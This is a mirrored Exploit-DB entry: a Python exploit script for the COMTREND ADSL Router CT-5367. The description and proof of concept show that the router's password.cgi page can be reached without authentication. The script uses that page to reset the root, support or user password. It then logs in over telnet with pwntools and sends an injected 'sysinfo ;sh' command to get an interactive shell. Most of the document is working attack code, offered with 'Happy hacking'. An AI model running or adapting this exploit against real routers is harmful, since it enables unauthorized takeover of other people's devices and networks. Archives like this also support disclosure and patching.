bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/43389.py
Offensive Security b91055c9da DB: 2017-12-27 
8 changes to exploits/shellcodes

GetGo Download Manager 5.3.0.2712 - Buffer Overflow

Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation

COMTREND ADSL Router CT-5367 - Remote Code Execution
Joomla! Component JEXTN FAQ Pro 4.0.0 - 'id' SQL Injection
Biometric Shift Employee Management System 3.0 - Local File Disclosure
Sendroid < 6.5.0 - SQL Injection
SilverStripe CMS 3.6.2 - CSV Excel Macro Injection

Cells Blog 3.5 - 'bgid' / 'fmid' / 'fnid' SQL Injection
2017-12-27 05:02:31 +00:00

124 lines
No EOL
3.4 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Globalnet COMTREND ADSL Router CT-5367 Remote Code Execute
# Date: 11-12-2017
# Exploit Author: TnMch
# Software Link : null
# Type : HardWare
# Risk of use : High
# Type to use : Remote
1. Description
Any user can edit all users password and execute remote code directly without have access
2. Proof of Concept
request this page before login to ADSL panel : 192.168.1.1/password.cgi/password.cgi
<form>
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="120">Username:</td>
<td><select name='userName' size="1">
<option value="0">
<option value="1">root <!-- admin -->
<option value="2">support <!-- support -->
<option value="3">user <!-- user -->
</select></td>
</tr>
<tr>
<td>Old Password:</td>
<td><input name='pwdOld' type="password" size="20" maxlength="16"></td>
</tr>
<tr>
<td>New Password:</td>
<td><input name='pwdNew' type="password" size="20" maxlength="16"></td>
</tr>
<tr>
<td>Confirm Password:</td>
<td><input name='pwdCfm' type='password' size="20" maxlength="16"></td>
</tr>
</table>
<br>
<center><input type='button' onClick='btnApply()' value='Save/Apply'></center>
</form>
3 .exploit
#!/usr/bin/env python
import platform
import requests
import base64
url = "http://192.168.1.1/"
''' first check default gateway '''
r = requests.get(url,allow_redirects=True)
resp = r.content
'''Check resp'''
if 'Authorization' not in resp:
exit("[-]Invalid host !! ")
''' Change password '''
again = True
while again:
print "Which User"
print "(root | support | user )"
user = raw_input('user : ').split()[0]
if user not in ("root","support","user"):
exit("[-] No user with this name !! ")
print "[+] Update password ",user
password = raw_input('new password : ').split()[0]
print "[+] Update new password ['",password,"']"
if user == "root":
url +="password.cgi?sysPassword="+password
if user == "support":
url +="password.cgi?sptPassword="+password
if user == "user":
url +="password.cgi?usrPassword="+password
pass_b64 = password.encode('base64').split()[0]
r2 = requests.get(url,allow_redirects=True)
resp2 = r2.content
''' Check update '''
if pass_b64 in resp2:
print "[+] Password for user : ",user," updated!"
print "Happy hacking :D, enjoy"
else:
print "[-] Something Wrong , please check again! "
y_n = raw_input('Do you want again? :D (y/n) : ').split()[0]
if 'n'!= y_n and 'y' != y_n:
exit('bad input :(')
if y_n == 'n':
print "Go Go Go :D ,No Time for you Mr.Robot"
shell_yn= raw_input("Do you want shell? (y/n) :D : ").split()[0]
if shell_yn !='n':
sys = platform.system()
if sys =="Windows":
exit("Sorry only on Linux or Mac Os")
from pwn import *
target = "192.168.1.1"
port = 23
p = remote(target,port)
p.recvuntil("Login:")
p.sendline(user)
p.recvuntil("Password:")
p.sendline(password)
p.sendline("sysinfo ;sh")
p.interactive()
again = False
Reference in a new issue View git blame Copy permalink